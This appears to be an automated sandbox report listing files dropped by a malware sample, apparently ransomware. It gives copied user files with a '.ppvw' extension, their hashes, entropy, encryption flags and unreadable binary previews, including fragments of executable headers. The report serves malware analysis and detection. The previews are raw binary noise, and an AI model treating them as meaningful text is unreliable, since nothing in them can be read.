                                                                                                                          Preview:1.1.9..G2.f....I..<JwiN..]5..H8/?:...S..5.4....I.^...y{.d[.-l.RD.5T...P.U........e...n.h....l'.w...{.....Z.D!Wt.M.......?..q.c.$.....AX..;.?@j.-`....U~.u.(iM.0`P.AM.l`f*".#...(.[]y....zh,..SZ..X5P...(....'.p..~.....b...XB.`l......1p.....j..7^.6d...` .o......"[..Y3....yvpA|......{/...]...#Wp.O+.u.:....R..>C.`.j..{?FyY..SH..T...k...b.C".NL....."...\...E(-.EnNO...Mu.].s<..(`5!{..q7....'Y..w....]m........o..h..#T>.-..\....9.Y.E#...&".4...6.J.........z...i....I..4.u.....E..J2....\......B...|..n7.n.r..l........e.$Lm.J.....*M.....Y#.q.....$Z..n.J....b.(..P<U..hE`.JE>......V........pIv..E.>&...MB.`jd..>.. ....2.xr...Aa.;.+m.\.-...j....sH.(..d..D..H....c...>..t..t.J"...]y.....z...e.R...E.*.n...>.g;y. ...W.....*....v.h..X..A.. b~....A...E....Fq..Q.....2...l.. ...h.@..%CY.~N..<.@.....=..L...i......s...._~*.Y;..S.Q>...;s...|.W.1..gi...:....U...V.....T.x )..t&.QL..E...q./'.......Y..#.^..),..xo..3?,.@.L...7..%y..{.....M..Sj...z...6T.c.,$

                                                                                                                          C:\Users\user\Local Settings\Microsoft\PenWorkspace\DiscoverCacheData.dat.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1353
                                                                                                                          Entropy (8bit):7.847756433266105
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:YnqX/+oxrlBGbdJElGvjQ3uhL1Bkukit56wxUmNwqQFfRFlkEceodbD:YnU+uxBGbXZv8ehL1BkFK5lx9jKF+D
                                                                                                                          MD5:B20A8F8050191CD224BE20793C47D6F7
                                                                                                                          SHA1:EEBD0B1D7447F6A3F5F39A39456A8DEE15FD201F
                                                                                                                          SHA-256:C4ECFFA1C402AE98A457A4572CCD274F111D0EEE4FBB4303FB40909461433130
                                                                                                                          SHA-512:01B27F9B9F8F0E7806985B702ADEB5AE1023C95868025A0F623E112F507F13596F81A1E02A90CE555B2D76D9ED16B7A3FB9ECEC9924DC1104AD9D1F033CF2D90
                                                                                                                          Malicious:false
                                                                                                                          Preview:{"RecZ..W....m_...^.W.....+.DCr......$W....zz.3.......i.CNZb_Fb...d.....3L.&.K...i.. .c... B..,..Mf.s.....pd.EBP.lR..raKN...".j..sm.).]..3[......Q..N.$......*k..8 6.))_.d..i....cw.n...0.0.....1.T>.F2...,j...5..5.....8.9..@...}C..@gXy.<...."..<g....<....@....q.{.......AVl<...Q!.....?S...Zs.Hx.....=...../-G.g.....gg.G..Qfa..[...H.P..7..i....$'...C..cF.q}........ZR..`.k."..7..y.?...Ko...R...?.........#.#.) .z.....9....aM?....._'H\Zk.}?.../...+....m.+.&.t_/....-.3..g..#.....1.@:.V...Ee3.I..;a..U.:.3..m\_".J.... {.....?.-..Wa......./.M..f.Y.5k.....-^......q.'..[....5A@....,..37.|.n.\..,!E......@*'...e.@.. >R..7........3^..0.Ps:....&.......qp.0sP...7...M..p.Jw1....c.k........D....sC.........1..w......We.....'P.........!...Kf.X.g...Vc+54....f...V..B.^.{.....\...U..].;.m......vT..z.....|.{.c$...m..a....+.j...,^"..<.9...P{.0.....k....0...$.{.3....n.$......c..Y`..5V|..*..n.u{.J/7.R5.^D....>.#.n. ....PS...,...H_..'.o(0.6..w.(.U.[..;

                                                                                                                          C:\Users\user\Local Settings\Microsoft\input\en-GB\userdict_v1.0809.dat.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20346
                                                                                                                          Entropy (8bit):7.990491895490427
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:384:THkwrkKsSNleucOdXf9+rq+PS6YJJG2HL+ZXS4nNSrRETDBjc3PP3:Tr5PNlhcOBf9WSQcL+9S4KyDBjcfP3
                                                                                                                          MD5:275FEDDDE24E67AC17E0E0734AC091FA
                                                                                                                          SHA1:7DD924D14F40907484A53BD9FDA1BEF8DD199D68
                                                                                                                          SHA-256:27829FD727017E7DBED9107A0C94629AF9CB753796D13DE7FBF0F9856EA6FA98
                                                                                                                          SHA-512:8DA7D0EF596FE428A609969C8228EE100E0949ACE96F097CDCDFD690B44B57D18C176AA89303E3F0754ABBAC5AA9596D77BD2EF2406F93020214A16FF493DBAB
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......+..#}[..,.!.Ksz.^...{.F..{^.....6$#.....l.5......9..3c:.T.p.....;...:;?C.|..q E....`....T.q.\..5.KI.M\.y].|O.j....h...z..o^?..5...T.....E.9...VZ..*.t.V.....%..7..[7...B..........{..Z...`e".!...u..{6.......+..,.b..[...^..]K..M.m#gz....Z......<...6O|.E..wT.#..a,.....;FVa..n..F.W.A..G.1'........uc..p..c_..6.q...xw..e..~.f{/.....z..,..z\g...@u...t. ..33.lA.....{i.....M..$...8r0.u......J<~:d.'.....mj/kU......_..<......c...8{N6..r........e.^.W.*......>..[..A.u...l....k.z.....9F.C[..pm....c........./<}.@.X>..... ....&n.n.=....;.F*...p.."."\_$+LA&Tm...Y.k.u....cdF..w.d3.OY.?...k.O..Xmzh,..]\....j.}..d..}.~..`b......O#.W.[F.:`NP.01dX_.,...c... ..]..NG..Cl6i..0..jd.....O~.q.#..s.....o.Vy^]3./.....-]fg..-s..J..WN7)....v.....Pn.r{^z...4.+)22}.I.....&...Y.....[...?........p.r.......f....U.za..K......>.N.z......KS.]!'m......Y...^..!. .".$B..F.....c.1...#>e.7...0..$...N[.d....u.$ICl....a|..].:....x\.....ab.LM......F..Hl..Z....N1r$..7.J=y..{M

                                                                                                                          C:\Users\user\Local Settings\Temp\acrobat_sbx\acroNGLLog.txt.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):24210
                                                                                                                          Entropy (8bit):7.9917209885167075
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:384:eQAjKuFY4/6hWUM6gzjD5GBKpP11cyTVtUpOAJ5vUBkR4Bl8Ubl7fqky8CVvNMrj:eQxuFt6h66UjD5GcpPLcyTVtUpOAHMBt
                                                                                                                          MD5:057BB02B71E36FBA0BA4F41CF1F7D9CC
                                                                                                                          SHA1:F5AED7082554C29DDF669BBEBD9721837147B33A
                                                                                                                          SHA-256:48A686AB4DE5CD17059A49B7194984179D625B51475FF0C33351A8A10E4B5A69
                                                                                                                          SHA-512:5A2572C705720128638D72B8B2225958DBAA38AA9A28469E6943FA6E8F8F45A7F53720F4C79A40BB98F5AB2A786055AAD620F7FAE0FF8FA959CDB1F828475C9C
                                                                                                                          Malicious:true
                                                                                                                          Preview:03-10X....g\..\LJ....h@...v.C.b.E.~.....4..{...!....i.K.{.f(.j)..[....C...V...t."..1...w.....iN.2e.z....D....'....".Kc...H..._X{]H...........l...w4R..HVg.87.).W..Yf..V9`....V\H...;U...">...#.......Z$.A...O.N....7....~..}.y.r.8..;lF%N.S$]...4 .,Ec?.X.b...?].X.4)..4hl...].1k.J.....noO..H.^.....].5.k.. .~..Xji..W.)....K..y.O.Tr..c...N....=....*..r..,........E..$..H.N.....6....)+.f.0...P..m.S.....A0;E4X7d .."......PF.G:..~.FC.N...N].7..V.8....M./.5.@.xx..6...].......2.....q.1....=...~.D...a...I?.@..<`Wc.c.2.}T.Nk.A...f...U....."_.J..y.....7..*.....'X.E...\)`..l...9.l....{YV..,.w2.....\.V....B_.V.8.....u....5...Y..7.......x...v}......8...x...ZPg..N..`......."..m..?..}....>....7 G.OG... ..O..G..\....a.\..a...S.W......B.^.t8~.o....A....9.8x.(....J b...?.$....f?..5.A...n..@..h....YP.*zQ8$..A[.g..X9.!4..9ZRk{._.U.B.B...3.8.....%..|.Y4SS.hq>....Xu....4.`....c.].d..L..$..MH.......|e<Y.......-.....2t.nZ...".\At..y.-5....3J'...n....4..w-/.@

                                                                                                                          C:\Users\user\Local Settings\Temp\wct3D66.tmp.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:MS-DOS executable
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1601198
                                                                                                                          Entropy (8bit):7.987447791414598
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:jIsTqZ70SeiN9YqxCCg83udcWXDYajPF2410wuRpGfFki94qSe/wsNfzUf:jIz24gQu3TPZ2psFkiSqwozm
                                                                                                                          MD5:76515A56AE9CAAD2DB57BEE594C3A926
                                                                                                                          SHA1:34207DBB219A28B24B11980932BCC073446CA9E2
                                                                                                                          SHA-256:3AC489B0AAA7C352C0B124BFEC0AB532962FB77A4F70F64242F432444C6347B2
                                                                                                                          SHA-512:A1C967ED592B83E72FE74D00563D43F544A92546412B6454AA6D112DB790541C5ED1B24922F7CE3F0D9FB3F48744226D3C3F097B16B6AFA4A90F949BB35C8079
                                                                                                                          Malicious:false
                                                                                                                          Preview:MZ....P+..|....{.A.l.j.:..k.?z.......A?..}...M|"....,9.....m6..........)h@...l.....x..0..G.67...+...q.j.e.t&.t*g..].J.W,..V.B....7$r<....r......k!\T.$...zF.xf...>{D........?..l..~.O.S.0....5..`.^.9..s...1........0.u0.wm.......E.i.%:.!.(.:.$....H..u.....B.z;..%`...[............4.......8....4Q_*.v.Ae...A._.E.~...<..9Yv*..d..%.D....._D..T_..~.#.xh.!......&.......o]..l...MbD..$F)....:..c.Ur....J..oDN.I..r...wg..6./&,G.T..\.\5rsiA........{J(o;..'Z.z......rs. .b....C.......t.E.M.|<.@@...k.F._A.x.!E.I...@PO".w.hp..V....*.V.NWD.t.B1...H.y.v...V..QL..#....2.j.#E.qRxOe#..d.;A...+.K.{7..X.OQ..M.....[.).....`.[z..h*....A@..-t..*.z..'..l.Y...s. h/......y..@.&..z.3.'..X...xo.z {.P.k.g.I&.;.@J.6f./.H.V..y.2b.S.&...VmH...a#C-+..F./.Z...@......@..;..A.l...B<C8u.56.R.eq.Sj...P-........WP.n........Ek...6....Qfi....!...%..W*~...../x..z.q.8...Z.K3.k.....X..u.hJ.gk.1.._...;f....E>k.P...G...k.Y.....v.{r.#YiWP'..\.....5.U......X!"...W.m...Z..N.D.

                                                                                                                          C:\Users\user\Local Settings\Temp\wct443C.tmp.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):65188
                                                                                                                          Entropy (8bit):7.9969931080654435
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:1M7p+MNxA1RK11ac7QsNFgxVgt/Y6Vb5z+5+wJGCl0SOYxdaZRIb:jMNss11ac7PrOVgt/TU5UCVXxdyRIb
                                                                                                                          MD5:C6AED58376525D692EECCFB51A13ABB4
                                                                                                                          SHA1:C195CCC7BF727518FE95BDF6A80D5DEB1540BCC0
                                                                                                                          SHA-256:0D7DA926F598D4DA1EBB1C72C2C38AA738D4F016208C1A13A49969244EB8BA4F
                                                                                                                          SHA-512:574C7F42A8831A5F45A7DFF7220208774FA259F2C011F292B5427ED2E3072E7CDCF08B4F89B345A1C3F35DC6C6CE332FA09C58E5B4F6DE66C9979CD03098534A
                                                                                                                          Malicious:true
                                                                                                                          Preview:{"ram..7-..#.l..Z.f..E..0.E6.1QOfb..xZ....-..=...^wNM.(...qX....7{\.c.+...5...SO....jj..W......{.W..Q../l.v.jf.`.z.fx.....@..7..RZq$.`...0PvZ....^.&.V....;7.......k.[d..2p9..Au.8./yu...9...f.sm...|f..`8..t...r.k6.G.h.../j.......7....(.M.MK.#....X`...%.6.[.Cv).....=..NP...,..cxf6.\.f'.E+..`B.(`".M..SoE..[..U).5..&...Z.O=..s.jZ[._~..I5/>......n.j....S.ZjT...I.....@.of..;....c..,..#......./1.3...W.`..6....-tY&3.'3...gr.......M...r.....?|...W?.T.ut.6...:.{-A..+..>.f.,.$.U.3....'j...NYr...q...A..[Y.Ev.*/.:.o...i^HR.".Q..*..t...U...k..8.n.[*...M%..W.S.V .:..V....".J-.~.*.3|........@M....a.t..ED....*..c.Q.*.0.x..._. ...........j.......n..<.......M./.....2F....R[[q..].HAg8....X/.*.=......N<.l..nB..t.h?..........y......^RE.A.w"K....`. ~.a....h.1OQf.bz...x....8oM\u=X..6%=.....e..J.J...5..C.....c.hee.m.U.~...g....i....n.c).o.3,n...+`.e3W@..RH.O.nx.....f.Hq.A.4............$..X..(..[..l..@.....bS...%.M...y.3T?o.0.....V..o..7..#...F....^..H/...;.

                                                                                                                          C:\Users\user\Local Settings\Temp\wct49A7.tmp.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):65188
                                                                                                                          Entropy (8bit):7.997102900259094
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:MMOl4Br5TkxUN9lU25djMLJVCB7OUsO6HEIX7SW3MiVwBIPx:CmZKS9V7Ou8EIX5teBIPx
                                                                                                                          MD5:053A2DFFE138782F810D91F8D5B4F845
                                                                                                                          SHA1:74C1F1C57CB2CABB460A0B42B773FAFDC543532F
                                                                                                                          SHA-256:BDFBE44FE1749DCE816DA061BE9D44A8A4DEB4E98D344A3E581994F2B5CBA712
                                                                                                                          SHA-512:DBB572DD35D895713B9943388BC52965AF1649642BA2877D0907A8BDAF9A0168EEDB65AF8AB585D5E59E9DE8D9AEB993540C713A056EB0AA255DAB51FA6E84D6
                                                                                                                          Malicious:true
                                                                                                                          Preview:{"ramP9#.....9P..Bp...Z1'...?G.+j...*.D...Bk.?..=X5....1.....Y3..._...<..........7_}@.&..g.Nr......C*.1..N...g|....=.T-...zl......Eu...?.2.....#....~.<Yw.a?w^T..w..vS4Q..JGM:U.{....j.........l.P.<q..._.M...m.Z!..xi...............s9>.D.....%D I...2wT.k./...L.L$.G7.......M$C..J*.DlT.#..W.Ab..|...9.y.i.1..N....d..On.K2mj..KJ..{.....".........2..Py.i..Y...;.<../Y9....8S...y6..;.YZ......-.$mV...r.z#Cu.L>...;.vh..=.S..k....s(h.Q....5...`.....|V.........`..v...38...n=.K.U.+...5.......zUa..........T]..6..#^.3...........d@.8....Z.....\..N.%v"...(s. ..Njl..u.`.2.rk-.....e...qe.W..YV..w..5.KO.....4.@|..........$:bje.ah.#...Rm.....EW..I.a.1-A......<.Y....1...\T..k...LB...x....P$..L.2.. .@.7..`?d..a_@.v.4O..8.Zq.....9X...=;.>X..<..j<|...6...i..(..~W...Q..R.L..fm...2bh...L..../..6.y.7.>..A..v......3..6VXB.[...((}.6.N.A....q.y>kXL..}u-..lp......W0.h..sH.&lO[T8.......nI..!+.....lokL..y....V.*...$...J6.Rs...G...pB..*.F....Y...YV.#'....z`..{.qU..9...2.....

                                                                                                                          C:\Users\user\Local Settings\Temp\wctAB5F.tmp.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):74525
                                                                                                                          Entropy (8bit):7.99762408349614
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:rdXUGKnJAktTXUsDwFbuSzrY02SOL/cSwWcHiqKhkSBqap80Rp:pXUGiAiTXNwMmr8hcScIIamGp
                                                                                                                          MD5:4C0743AF377C4707D98478EEE77944E8
                                                                                                                          SHA1:D5DC63FC2F3FEF3481829DD99491FE4BCDAF8BA5
                                                                                                                          SHA-256:8F8F1845C04884B997477398272F058DC7670794E871AD741553A4AB7E9F5E27
                                                                                                                          SHA-512:4B2949B9E0A4D9D0A4872FF61F6F0C312392F06025FA9EC947A0A0F50A1AEE73B448203A241BDCBF95E20FED095A50AEBD21067565B1EEEFBE490A70AD620797
                                                                                                                          Malicious:true
                                                                                                                          Preview:{"ram.Y..cik.^....E......Lw.N.S......IbB../<'...8..h.h.~......5.*6.B......9y#.jYBI.<...X)..=...s....j4..43G+....6.6Z....G..\....$]...2mzZH<...~.:..C]..T.....t....D....uC....A.C...>..;._..|..H....U8dI>..,..K.5..M[..........Z.._ X..a....:.%.K.G}......v.....Y..[...)..._...Ly2w2..sb..~..r,"?.....V..g...+c.m;$..'..........\S...f.o.d..{X:p...%..d..L.%AS.o..[..G6..?.1A.,Euhf-.9..(tT.S...s......$EvX8.. .{+...7lO.\4F....#...="g.R.w^...{.......*.p.@..X...W.r.$.@.:uv.Lfb...*.*e..[...c&.?....V4.Bg.p.....cW.:..hED6.5._[.......Q..^e9.k...2|N..c.T.m..Z..o..K....,|h;..B..f..y.3..V.@...E.]{......H#1.fh....t.&S.N..`..i.@.{...(HU."..X6...U2..+..0...~.M./..".w..Gd<..Nr.h...@........w_.|....H}g...dI...I ~..).....v.@.]....#.T.>..^........s.l ..p.T>...e........Q. .$!.t.V........k.a....c....,..j.HF.o...9,J..IU...v.."...u...X....%.....u.....yz^..<Hh..].L.w.xC.}*.....J..a....\.g.?...o.}N...].. .".o..>..}.{..Z...CH.#.({;......B..~..Y...u...b.U...R.u...K..8=

                                                                                                                          C:\Users\user\Local Settings\Temp\wctDB2E.tmp.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):65188
                                                                                                                          Entropy (8bit):7.996928043079858
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:hD93R3q7YNn/znoF6JE3X+tJz/7NQnhzP/CdKUlHvdBipzODNau3s7rpDiF:X3EYNn7062H+nQzPhSdMpzLu3s7rpDq
                                                                                                                          MD5:F15A38844C90FF1805B18FCDF4442C31
                                                                                                                          SHA1:D4486C45DC0215A9D0F121D3D2BC2A9E4516C625
                                                                                                                          SHA-256:5D44FEE52C9C4A36070F913ADFC0BC7940CB8B00F46E5977905098FFA7C4C9F4
                                                                                                                          SHA-512:D61ED904A3DA821DF9E4B92F573365371B8BEA5B8F06D64A4AD760EDADC329CFEB7C83600FD3C18C18C714CB43D44A290A95CB920B23CD2223DCFC251A4297D6
                                                                                                                          Malicious:true
                                                                                                                          Preview:{"ram\..}.h}d.?.....+..{V.,(.|#.'j...p..?.#T..P.v........wx..]H48.b.".....6...p...r.>.U.V|.....8..3...N..B.IqA..J..1...".N.u.'..X.Q....*.....\..rk.z.<.S..P...R.g..r..E...d=....5.E......&OG...n.>iq._k.bX...t.r....v..m!g/....f...].;.*..[.Q;.8kQ..<..O.6R..G..o..S .z...y.(....&.w...D.t..'.f.(K&(.....%z[....U...&yo.G.v... !.['.!.....?0..Y..+t.....e..........D&D..n.....3...1..d.8.Ds<w<u......D.'..(..muw.}.Yi(4..[..x..Z....&O....#....(l.O!l..X+...a.V^O7.6...6]ra...m....'......z/.C.....w...T.L.8e..BY....,.RC........ROaf.... 'V!.M....]..E.W..zc...M..R./X.g^..!.Q.-`:.g2<.....%..0.k...{....*....b.Vng...O>....iS.]B..O.=../.>....%(.2.....k..[#N.{....H.0..!f0H.J.......03..5HH...JX.4M|.#.8.......+.B.M...2..%z.ayw]I...5..!m....A.U...0...s..p6d....x-......Dk.......):..-.d.P.S...e.E.....Me-.....zA.E....g..G.i...*&d.M*j%t.......mRL..{.....Pa8......&..-0.>.v8.b...tH/.fA...b.o.\N_.\.s.?mq.d.+..i.|!.>...IrD.A| .d.?@G".[r.r.9.6......-. .3.......W..PV!d..{

                                                                                                                          C:\Users\user\Local Settings\Temp\wctE4A4.tmp.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):74525
                                                                                                                          Entropy (8bit):7.997653087868866
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:scg2wh7Ye0axLxnhKW12xZxPg6d5lQgl7ffClcQU0ODdoAWYxM9kQ5UAdt:scBwhUHaf8W12xXPbR5qltODtM9kQukt
                                                                                                                          MD5:1528CC3E3F04D24BE773CEBD946E9B8C
                                                                                                                          SHA1:C75060880353E9332947B1E556735034B597147D
                                                                                                                          SHA-256:BAA3E0F6792D47FAD8F6D2D306C50134C046D7296A2F7D7A4B62C71326661553
                                                                                                                          SHA-512:E93C052572C01C129F73BAE7760F39B81A139C1371AA87E0BB9887F0B92859DC0C84DFD373C2D152999893F321D94D90FE6B7CBA0071CC9A8EA0D14C29428A7B
                                                                                                                          Malicious:true
                                                                                                                          Preview:{"ram..3..*.*.....%.i........gW......KJ7..z....(...../?.....a{.=5.e..c%....6..u."..vIv....[......(.G...B....S..G)..C.A.N.'[...i..7.......+.uWs.....w.|..:.~.R.L.H).n....@*.y/\3.gA.zy.3.........y..P-..U....I.V?*\.._..[...7.nC...B.;.#.....k!.w.~?....#35...o.....3~.Ifv."..u.....*T!'w!I.6.X.O.....C/..~.3x.%m7]d|......jk1A..U..Q.5..C...}..g..M...'...d(.....C.l.vO.UJW..PSb.!q:..:.i...a.$.sc..k......<..0.t*IQj.Wc...4-.......@.U.M......#...'..Q..?.;~..D...WB=c......n.....<.;.EC.H%n......2m..D.i..,.r..5...M]...aJ.Hj.x.L...y..nyl../.-q.$...4_......7o..3...N...R>j.mi.~X......~.W..@.;.=cVH.]..<...M>.v.....OM.NK..!.\4i.;...>..d...20.[.|`..~.@Jo......X.t..!'..u|.......hH..&~<..?.../..;....]z..0....@LS.....p".\6X|-.=.....O.[[.L.S;(..Ho....&....d.EO...)..b.-LV]t......_iT....Z.5.S.R/)....a.........|.%x.;8.~......]aD..=.....|..Wx.8S/.I.eUTF#...A..T..yD4..2.GX=...e...j..1...O..=v.@3...p.'..;..Zt.Od...aQ.y.....L........DVU....n.=.Q..s3\..;.q.F.Q..?

                                                                                                                          C:\Users\user\Local Settings\Temp\wctEA40.tmp.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):74540
                                                                                                                          Entropy (8bit):7.997377743762606
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:Rt3OzRYPrBO3lc4nF8yg+oH0HVRC45631Ek:/OzRY1yc4nyy7oH0HVRF56FEk
                                                                                                                          MD5:22B7FFAFEF865116427AA8E1B704208A
                                                                                                                          SHA1:30008894B7BF9EA2B91CD7CD2DAE82F3194A0D40
                                                                                                                          SHA-256:1CA2AE6E66B2F034FBF204539BBAFDC515D98902D016F921E364F42C9A7A23C5
                                                                                                                          SHA-512:1ED52E6705B8D743ECB7F48343A744A36765D0511C322E208BB9EB24FDD9255B714FA95041FC5345666CB732E53D9325A43E7C176C3B7D9F083D1ED53CAD5544
                                                                                                                          Malicious:true
                                                                                                                          Preview:{"ram....J.F...ie..1G....Uw..k....C/z.[..If..D.b..i..o..K....O..%.>.O.G....yx...t#.~7r)L.{..9G..N..L.....yC.>.y..3".......[..o.b.8r.3..;.j.bc.=.Xq..Bi.w..>E.[.G..... .n.Po!......+.![O ?.|....D.+.&K^.H.......V..(L.. ".@.{m.=k..4......I.....4L....9&.........].E..l....H|....n...b3..Y..qE.-R...S.0y.....Zf..+.8......<.oO.....r..=$.z..IEuC..u..7.1.6.x%...I...O.}.$..-...l.~.m....|nF.-.9..=.:r4.s.<...G...IWU...{.z.<....^V...xs....6.BI..u......c.H.%^k.c......!:..B...8..SZ.Lz .5e...Q.....U2|..B.......N..A}sQ..w.r.+......(.b%..4....N.".dX..5.s....I*a..p~.YW.......P"+<@...`\..z#~..A......V.....Y..kN..`j..L.............N........f..E..-.Jd...hT.A1xX.....J....e..J%.<....zb....^...6.N..G5..KA...V...k/.7.6;.i+.s<]A....H.?..;H.QO^.............W.D.i"\.g WIT.h......<_.....h..&K.!.*.F...o.l..N.'5...s.!....J1VL}..;.d..J.S....{..e+...2.p>...G..>..A..8..r/qgTDE..0Cd...de...7..rS..jr....R......3H.$....O..6.0../...Y.......9.A.._...B...&o"um+.X...)..._U..Z..B..,.. U`

                                                                                                                          C:\Users\user\Local Settings\Temp\wctF411.tmp.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):74525
                                                                                                                          Entropy (8bit):7.997343302822231
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:MkynpxqaCnbFIrl6oKcmm8pFDHTc4r+Rify5DZ81NNXSBqe90mhFBbhEWX1m:M5pcaCbacoxmXDHQ7rZ8HNYOx
                                                                                                                          MD5:676C74169967613BEAAE4E55B7356576
                                                                                                                          SHA1:1817E1AE055DD0A2F31E0BEE263BF160F81F7991
                                                                                                                          SHA-256:579884E611790B89A7ACE2588E0ED541366CF412A760E84A2B21666BC4119A09
                                                                                                                          SHA-512:401626E8CC195E24AF62877447B8376D590DBDB62EAE50B97C4342BF35730D26DB925F6A0C9C956D2C0C5D0B62A2996F056A0B45BACA9E6DBE720E22A8A13BDF
                                                                                                                          Malicious:true
                                                                                                                          Preview:{"ram....$z~.\.{.....s....Ee.....}.d.Iu,....a:....}.f.rJ.V.g{.mB;..x,uM.../x.2..a_.vk..)X.,..A................a...S.....0$..1..z.~^a7..,..`....(...3..r..x../v7T[!8.N.$?.*.....5.:.VYad...:.....z..Si.&.r.h.N...?.... ...5c.>.!...?.......!...]...x.}..B..1>..G....#...p7.....V.L..=OL.e}...6........R....Gl9.xT.!Y....9..;c`..6..s....,......#.l...sI.+.s*1b....3jD.......>(.<*...Y.(.b..55....@.F...3U....l.c.e,s..J\.U.............`.. [.O.[........lJ..@....3..|`...A.4..)..K..q.,.I....L.'.A...a.={.6.......s.....8...P...I..ps.....u."..."..Is.A..<..I...@....T.{.Z.Iy....*....7..(..2T.:......8...j..c....I.0.S...+.\.......[...]...5m.l=...C....v..*./...Tt....`B....5.U.kh..%......s.K.#......_.Yd &#..'VX#.&.9^...f....(....x......)a..qm..i....&w.?...&..N.,.R.9..i...*.....~.9J...)(...KW.A...X;....'u...<..p.W.....4;...../.9....g.nX.......kS{e7c.....J...c._.M...rx.k.._1Lv..^..I.v...V..,C..1..3..W...`.r..5C.).....~.D...B.v..1.t.G.O^[.3J.h.d.C....G..)n.@....b

                                                                                                                          C:\Users\user\Local Settings\Temp\wctF86A.tmp.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:MS-DOS executable
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):42164934
                                                                                                                          Entropy (8bit):7.947662803306286
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:786432:XwQNeYDxVRrMPJy7LVV4NDDmdrZy9wOtg5gGOdjtjSNu4GIluUNj56I59E:AQcWxDMPnN+dk65gGUjku4vNjLjE
                                                                                                                          MD5:3F11CDDCA921671B0F182E67C6658425
                                                                                                                          SHA1:2CF0C4A725FB93637037BF12F505A64358E800CE
                                                                                                                          SHA-256:8318085E88234BA08A21E8E449C946C91C4C629099F69348CF6C71334BCA0F59
                                                                                                                          SHA-512:15F2D2E59FB51522A35435412978BC5CEDDCAB0E18D5D40DA60B39AC2E60A2E9F069EA93D6052DE17F9ABB432B8101A828A319C858E155D996A8396FB9A8F6D5
                                                                                                                          Malicious:false
